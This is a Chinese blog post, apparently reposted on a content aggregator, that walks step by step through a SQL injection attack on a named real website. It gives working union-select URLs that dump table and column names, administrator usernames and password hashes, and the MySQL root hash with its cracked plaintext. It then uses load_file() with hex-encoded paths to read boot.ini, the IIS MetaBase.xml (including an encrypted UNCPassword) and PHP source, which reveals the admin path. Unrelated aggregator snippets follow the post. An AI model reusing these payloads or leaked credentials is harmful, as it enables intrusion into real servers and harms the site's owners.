php_mysql注入load_file()IIS配置文件获取

php_mysql注入load_file()IIS配置文件获取

先看一个注入点:

http://www. .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(database(),0x5c,user(),0x5c,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
得到回显:flier_dbase\root@localhost\5.0.22-community-nt
如果说注入点算是第一个漏洞,那么这个root就是管理员制造的第二个网站漏洞了
表段:http://www. .cn/news_detail.php?newsid=1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns+where+table_schema=0x666C6965725F6462617365
得到数据:pub_config,pub_tree,pub_webmaster,web_img,web_keys,web_ly,web_news,web_news_review
pub_webmaster的字段:‍http://www. .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+column_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns+where+table_name=0x7075625F7765626D6173746572
得到数据:webmasterid,username,userpwd,loginnum,ip,lasttime,tree,name,dtime,sex,jobs
这下出来管理员数据:
http://www. .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+username,0x5f,userpwd),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+pub_webmaster
得到:admin_9b45d683e499e7bd
yfh_7a57a5a743894a0e//这里是第三个漏洞了,弱口令admin
既然找不到后台地址,那么干脆爆MySql管理员的口令
http://www. .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(user,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
得到数据:root*CB26B0546CADD30FC2432C095A6A3D54FA3C2FFD
数据库就一个账户,如果解不开,岂不是要放弃?那倒不比,第一,咱解开了,对于八位字母数字加符号的密码,学校的分布式密码破解系统毫不吃力的说。不过这个密码是八位字母加符号,也算不的弱口令,暂且不算是漏洞吧。
*CB26B0546CADD30FC2432C095A6A3D54FA3C2FFD对应的明文是qweasd)@
第二,咱还有别的路子,随便访问一个路径,反馈的是IIS6的404默认页,说明网站服务器是:Windows+IIS6+php+MySql的环境
先把c:\\boot.ini这串路径进行hex编码得到:0x633A5C5C626F6F742E696E69
然后、http://www. .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0x633A5C5C626F6F742E696E69),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
看回显:
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /fastdetect /NoExecute=OptOut
虽然能load_file加载文件,但是似乎用处不大。非也非也,既然是IIS6,那么加载c:\\windows\\system32\\inetsrv\\MetaBase.xml这个路径就可以获取网站配置信息了。
*注:Windows进行文件操作,路径一定要是双斜杠,如果是单斜杠,八成会load_file失败,探讨其原因,可能是因为,斜杠是这样的\左上右下,而Linux则是/右上左下。如果在Windows的路径斜杠后面跟个t也就是\t,看看在编程里面是什么?如果\n呢?\'呢?没错,路径的斜杠就没了。如果是双斜杠,\\那才是真的单斜杠。如果你需要输出双斜杠,那么你要用四个斜杠来表示,郁闷不?\\\\
最后注入句就是:http://www.fly-er.com.cn/news_detail.php?newsid=- 1+union+select+1,2,3,4,5,6,load_file(0x633A5C5C77696E646F77735C5C73797374656D33325C5C696E65747372765C5C4D657461426173652E786D6C),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
得到回显如下:
主要看这几句配置:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<IIsWebServer        Location ="/LM/W3SVC/2125961364"
                AuthFlags="0"
                LogExtFileFlags="LogExtFileDate | LogExtFileTime | LogExtFileClientIp | LogExtFileUriStem | LogExtFileUriQuery | LogExtFileHttpStatus | LogExtFileWin32Status | LogExtFileServerPort | LogExtFileUserAgent | LogExtFileHttpSubStatus"
                LogFileDirectory="E:\flylog"
                LogFileLocaltimeRollover="FALSE"
                LogFilePeriod="1"
                LogFileTruncateSize="20971520"
                LogPluginClsid="{FF160663-DE82-11CF-BC0A-00AA006111E0}"
                ServerAutoStart="TRUE"
                ServerBindings=":80:fly-er.com.cn
                        :80:www.fly-er.com.cn"
                ServerComment="fly-er.com.cn"
        >
</IIsWebServer>

 

还有:
?
1
2
3
4
5
6
7
8
9
10
11
12
<IIsWebVirtualDir        Location ="/LM/W3SVC/2125961364/root"
                AccessFlags="AccessRead | AccessWrite | AccessScript"
                AppFriendlyName="默认应用程序"
                AppIsolated="2"
                AppRoot="/LM/W3SVC/2125961364/Root"
                AuthFlags="AuthAnonymous | AuthNTLM"
                DefaultDoc="yindao.html,index.html,index.php,Default.htm,Default.asp,index.htm"
                DirBrowseFlags="DirBrowseShowDate | DirBrowseShowTime | DirBrowseShowSize | DirBrowseShowExtension | DirBrowseShowLongDate | EnableDefaultDoc"
                Path="F:\web\2010716\new_flyer"
                UNCPassword="49634462500000000600000040000000894077f761d33600623e24d0e5dfbe254f63ee6490a3af6f918760ac2fbd00627e07669149f74641659a4383366f9edefd9c02f6555c8692c1c93d2483008b9721cbdae4fac9a380"
        >
</IIsWebVirtualDir>

 

这下子我们构造:
http://www.  .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0x463A5C5C7765625C5C323031303731365C5C6E65775F666C7965725C5C696E6465782E706870),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
右键查看源代码就可以了
*注:load_file用的时候,最好在外面加一个hex即:hex(load_file(xxxxxxx))
因为我遇到过一个网站,主页不知道是哪里的代码有问题,注入点在主页。我用主页load_file主页文件,外面没嵌套hex的话,主页就被循 环显示了,就是类似这样:index里面有一个iframe,iframe加载的是index这个文件,index这个文件里面的iframe又加载 index这个文件,循环往复下去,直到把机器资源耗尽。虽然不知道当时那个网站是不是这个iframe,但是这样的嵌套确实有死循环发生,所以建议 hex嵌套load_file
我比较在意的是index里面这样的一个地方的代码:
?
1
2
3
4
5
require('admin_flier/common/function.php');
require('admin_flier/lib/class/form.class.php');
require('admin_flier/lib/class/db.class.php');
require('admin_flier/lib/class/page.class.php');
include('inc/head.php');

 

呵呵,这里不就是后台地址么?
显然,后台的安全性也不够。就算是隐藏了后台地址,工具扫不到,那也不意味着可以放松后台的安全性吧?

转载于:https://www.cnblogs.com/shsgl/p/4549426.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/431737.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

layui 鼠标移入变为小手_游戏技术上不去?看看外设选对没!鼠标篇

古有“人靠衣服&#xff0c;马靠鞍&#xff0c;先看长相&#xff0c;再看穿”的说法&#xff0c;现在在游戏里也有“外设选的好&#xff0c;游戏输不了&#xff01;”这种言论。虽然这种说法过于绝对&#xff0c;但是一款好的外设&#xff0c;确实可以增加我们胜利的概率。今天…

python分支语句_Python中分支语句与循环语句实例详解

前言 本篇博文介绍一下Python中的if条件语句、while循环语句、for in循环语句以及break和continue控制关键字。 分支的基本语法 if 条件表达式&#xff1a; 语句1 语句2 语句3 ...... 条件表达式就是计算结果必须为布尔值的表达式 表达式后面的冒号不能少 注意if后面的出现的语…

用c语言编程减法计算,求用C编个大数加减法运算程序

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼只写过加法的&#xff0c;杭电的A B Problem (II)(AC)&#xff1a;#include #include #include #define N 3000int main(void){int n, i, j, k, p, q, a, b, t, up;char s[N];scanf("%d ", &n);for (i 0; i < n…

creator图片循环显示_江淮宣传车厂家价格 图片 配置

国六 江淮宣传车配置&#xff1a;整车型号:CLW5040XXCH6整车尺寸:5995*2190*2970【底盘配置】轴距:3365发动机:全柴120马力排量:2.0L轮胎:7.00R16其它:助力&#xff0c;空调&#xff0c;电动门窗&#xff0c;中控锁&#xff0c;ABS&#xff0c;气刹江淮康铃H5宣传车图片江淮宣传…

BZOJ 3479: [Usaco2014 Mar]Watering the Fields( MST )

MST...一开始没注意-1结果就WA了... ----------------------------------------------------------------------------#include<cstdio>#include<cstring>#include<vector>#include<cmath>#include<algorithm>#include<iostream>#define r…

python字符串格式化_Python3 字符串格式化

字符串的格式化方法分为两种&#xff0c;分别为占位符(%)和format方式。占位符方式在Python2.x中用的比较广泛&#xff0c;随着Python3.x的使用越来越广&#xff0c;format方式使用的更加广泛。 一 占位符(%)%d 实例(Python3.0)&#xff1a; age 29 print("my age is %d&…

垂直串联六关节机器人调试手册_不止下棋能赢你!新型协作机器人样样精通

重庆网络广播电视台记者 余韬2019中国国际智能产业博览会上&#xff0c;各具特色的智能制造装备和机器人纷纷亮相。其中一款能和人下象棋的机器人吸引了大批观众的目光&#xff0c;大家都抢着要跟机器人“一决高下”。“机械手上有视觉辨识系统&#xff0c;识别出放象棋的位置之…

蓝桥杯c语言a组2015,2015第七届蓝桥杯决赛C语言A组--穿越雷区(DFS)

X星的坦克战车很奇怪&#xff0c;它必须交替地穿越正能量辐射区和负能量辐射区才能保持正常运转&#xff0c;否则将报废。某坦克需要从A区到B区去(A&#xff0c;B区本身是安全区&#xff0c;没有正能量或负能量特征)&#xff0c;怎样走才能路径最短&#xff1f;已知的地图是一个…

nil,Nil,NULL,NSNull

nil&#xff1a;指向oc中对象的空指针 Nil&#xff1a;指向oc中类的空指针 NULL&#xff1a;指向其他类型的空指针&#xff0c;如一个c类型的内存指针 NSNull&#xff1a;在集合对象中&#xff0c;表示空值的对象 NSURL *url nil&#xff1b;Class class Nil&#xff1b;int …

c int转char数组_C语言 指向数组和字符串的指针

实例1我们在pointer_test.c的文件中写一个test2()函数&#xff0c;我们定义一个有3个元素的字符数组初始化值分别为&#xff0c;’A’, ’B’, ’C’&#xff0c;然后定义一个字符指针pc&#xff0c;把数组ca的首地址复制给字符指针pc,然后通过访问指针变量pc,来读取指针变量pc…

python代码画小狗_程序员教你用代码手绘一只可爱的小狗,正好拿去送给女朋友给她个惊喜...

最近经常在抖音上刷到会画画的大神给小姐姐手绘各种可爱的小动物&#xff0c;非常的哇塞哦~ 作为程序员的我那是羡慕不已啊&#xff01;我要是学会这招是不是可以尝试给我心仪很久的女神告白了&#xff1f;女神没准会很开心&#xff01;&#xff08;好吧&#xff0c;我承认我是…

三个用户在同一系统中同时对他们的c语言,杭州电子科技大学学生考试卷2013年操作系统试卷(2份,有答案)...

内容简介&#xff1a;杭州电子科技大学学生考试卷2013年操作系统试卷(2份&#xff0c;有答案)杭州电子科技大学学生考试卷(A )卷一、判断题(共10分,每小题1分&#xff0c;正确的打√&#xff0c;错误的打)1&#xff0e;分布式操作系统和网络操作系统都是建立在网络的基础之上&a…

ASP.NET方面的一些经典文章收集

1. 在ASP.NET中执行URL重写 文章地址&#xff1a;https://msdn.microsoft.com/zh-cn/library/ms972974.aspx 2. 在ASP.NET中如何实现和利用URL重写 文章地址&#xff1a;http://tech.it168.com/msoft/2008-01-08/200801080919796.shtml 3. Log4Net使用指南 文章地址&#xff1a…

如何修改emcp的sn号_百家号领域选择错误怎么办?百家号怎么更改领域?

我之前就强调过&#xff0c;做自媒体运营&#xff0c;正式开始之前&#xff0c;先做好定位&#xff0c;选好自己擅长的或者感兴趣的细分领域&#xff0c;这样才能保证以后能长期做&#xff0c;保证内容的输出量。很很多新人听说自媒体能赚钱&#xff0c;就直接进来了&#xff0…

apache根据ip分发_腾讯广告进入“IP新融点”时代

文 | 若谷广告业务增长放缓&#xff0c;会员数量持增&#xff0c;爆款内容产品难遇&#xff0c;品牌方需求升级&#xff0c;在这样现实情境下&#xff0c;传统营销模式亟待升级&#xff0c;腾讯广告就此进行了一次综合性的变革&#xff0c;以IP新融点方式进行应对这一现实挑战。…

分治法求数组最大值 c语言,使用分治法求最大子数组的下标。

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼#includeint max(int a[],int left,int right);int maxcross(int a[],int left,int right,int middle);int xyzleft,xyzright;int main(){int T;int asd;int num[100000];scanf("%d",&T);while(T--){scanf("%d&…

eclipse下创建Maven项目

1.选择创建Maven项目&#xff0c;选择不适用骨架形式&#xff08;Creat a simple project&#xff09; 如图&#xff1a; 2.packing选择war的形式 如图&#xff1a; 由于packing是war形式&#xff0c;那么下面就出现了webapp的目录 3.由于我们要用eclipse把项目发布到tomcat…

git add remote_最全的git常用命令(建议收藏)

一、 Git 常用命令速查git branch 查看本地所有分支git status 查看当前状态git commit 提交git branch -a 查看所有的分支git branch -r 查看远程所有分支git commit -am "init" 提交并且加注释git remote add origin git192.168.1.119:ndshowgit push origin maste…

c语言链表复数实验,数据结构实验—复数计算器 大神提意见

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼// cDlg.cpp : 实现文件//#include "stdafx.h"#include "c.h"#include "cDlg.h"#include "afxdialogex.h"#ifdef _DEBUG#define new DEBUG_NEW#endif// 用于应用程序“关于”菜单项的 CAb…

Windows系统启动自动运行cmd命令

添加计划任务 转载于:https://www.cnblogs.com/qingyuuu/p/4565579.html